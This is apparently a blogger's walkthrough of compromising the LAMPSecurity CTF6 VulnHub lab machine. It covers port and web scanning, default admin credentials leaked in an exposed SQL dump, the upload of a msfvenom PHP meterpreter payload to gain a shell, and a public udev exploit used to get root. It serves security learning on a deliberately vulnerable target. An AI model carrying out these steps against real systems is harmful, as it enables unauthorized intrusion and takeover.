I recently learned about VulnHub, a site where you can download and attack some demo machines that others have shared. It is very useful if you are looking to learn about security or advance your existing skills. In this post I was targeting the LAMPSecurity: CTF6 machine. Setup is pretty simple, I downloaded the VM, converted it into qcow2 format and then fired it up with kvm.
To start off I wanted to see what ports and services are running so I decided to run a scan to see if I could get more information.
The first issue is that the machine uses a DHCP so I need to determine its ip address.
# nmap -sP 192.168.1.0/24 Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-22 21:03 EDT Nmap scan report for 192.168.1.211 Host is up (0.00011s latency). MAC Address: 52:54:00:2E:EF:25 (QEMU virtual NIC) Nmap scan report for 192.168.1.1 Host is up. Nmap done: 256 IP addresses (2 hosts up) scanned in 6.38 seconds
Now I know the IP of the gateway is 192.168.1.1 so the IP address of the target machine is 192.168.1.211. Now that I know that I can perform a scan on the ports to see what is open.
# nmap -sS -sV 192.168.1.211 Nmap scan report for 192.168.1.211 Host is up (0.00013s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) 80/tcp open http Apache httpd 2.2.3 ((CentOS)) 110/tcp open pop3 Dovecot pop3d 111/tcp open rpcbind 2 (RPC #100000) 143/tcp open imap Dovecot imapd 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS)) 993/tcp open ssl/imap Dovecot imapd 995/tcp open ssl/pop3 Dovecot pop3d 3306/tcp open mysql MySQL 5.0.45 MAC Address: 52:54:00:2E:EF:25 (QEMU virtual NIC)
The website seems to have Apache running so I decided to try scanning it with nikto to see if there are any interesting pages avaliable.
# nikto -h http://192.168.1.211/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.211 + Target Hostname: 192.168.1.211 + Target Port: 80 + Start Time: 2016-04-22 21:25:05 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.3 (CentOS) + Cookie PHPSESSID created without the httponly flag + Retrieved x-powered-by header: PHP/5.2.6 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3268: /files/: Directory indexing found. + OSVDB-3092: /files/: This might be interesting... + OSVDB-3268: /lib/: Directory indexing found. + OSVDB-3092: /lib/: This might be interesting... + Cookie roundcube_sessid created without the httponly flag + OSVDB-3092: /mail/: This might be interesting... + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + Server leaks inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Wed Oct 19 17:47:44 2095 + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3268: /sql/: Directory indexing found. + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /manual/images/: Directory indexing found. + OSVDB-3268: /docs/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + 8496 requests: 0 error(s) and 29 item(s) reported on remote host + End Time: 2016-04-22 21:25:14 (GMT-4) (9 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
There seems to be an interesting directory, /sql/ so I tried visiting it and lo and behold there is a file db.sql which I was able to open it and see some interesting data.
CREATE database IF NOT EXISTS cms; use mysql; GRANT ALL PRIVILEGES ON cms.* to 'sql_account'@'localhost' IDENTIFIED BY 'sql_password'; use cms; DROP TABLE IF EXISTS user; DROP TABLE IF EXISTS event; DROP TABLE IF EXISTS log; CREATE TABLE IF NOT EXISTS user ( user_id int not null auto_increment primary key, user_username varchar(50) not null, user_password varchar(32) not null ); CREATE TABLE IF NOT EXISTS event ( event_id int not null auto_increment primary key, event_title varchar(255) not null, event_body text, event_file varchar(255) default null, user_id int not null, event_hits int default 0 ); CREATE TABLE IF NOT EXISTS log ( log_id int not null auto_increment primary key, log_ip varchar(20), log_referer varchar(255), log_useragent varchar(255) ); DELETE FROM user; DELETE FROM event; DELETE FROM log; INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass'); ...
The most interesting part is that there is a password for user admin in plain text. So naturally I tried to log in to the web interface and the creds worked!
Now I clicked the Add Event tab and it seems to let me upload files so this is possibly a situation where I can upload a reverse shell. First however I wanted to make sure there is some way for me to access the files after upload. Looking back at the nikto scan, there was a directory for /files/ and visiting it in the browser shows that this is where the system stores its files.
With that known I fired up a Kali VM and generated a reverse shell script.
root@kali:~# msfvenom -p php/meterpreter/bind_tcp R &gt; out.php No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 1188 bytes
Now I just uploaded the script to the site using the form and confirmed it shows up in the files directory.
All that was left now was to start up the listener on the Metasploit VM and wait for a connection. As soon as I clicked the reverse-shell.php file, I saw a meterpreter shell open on the Metasploit console! Success!
root@kali:~# msfconsole msf => use exploit/multi/handler msf exploit(handler) => set payload php/meterpreter/bind_tcp payload => php/meterpreter/bind_tcp msf exploit(handler) => set RHOST 192.168.1.211 RHOST => 192.168.1.211 msf exploit(handler) => exploit [*] Started bind handler [*] Starting the payload handler... [*] Sending stage (33068 bytes) to 192.168.1.211 [*] Meterpreter session 1 opened (192.168.1.131:41387 -&gt; 192.168.1.211:4444) at 2016-04-22 03:29:08 -0400 meterpreter &gt; getuid Server username: apache (48)
Excellent, now I needed some local vulnerability that I could exploit to take over the system. After some research I found a udev exploit that this system was apparently vulnerable to (https://www.exploit-db.com/exploits/8478/).
I created a file on the system and set the execute bit on, then ran it..
./a.sh 422 /usr/bin/ld: cannot open output file /tmp/udev: Permission denied collect2: ld returned 1 exit status suid.c: In function 'main': suid.c:3: warning: incompatible implicit declaration of built-in function 'execl' /usr/bin/ld: cannot open output file /tmp/suid: Permission denied collect2: ld returned 1 exit status # id uid=0(root) gid=0(root) groups=48(apache) # touch pwn # ls -l total 40 -rw------- 1 root root 1045 Jun 2 2009 anaconda-ks.cfg -rw-r--r-- 1 root root 17219 Jun 2 2009 install.log -rw-r--r-- 1 root root 3419 Jun 2 2009 install.log.syslog -rw-r--r-- 1 root root 0 Apr 23 19:08 pwn
So there we go, the udev exploit was enough to compromise this server!
If you found this post interesting, stay tuned I plan on doing some more in the future.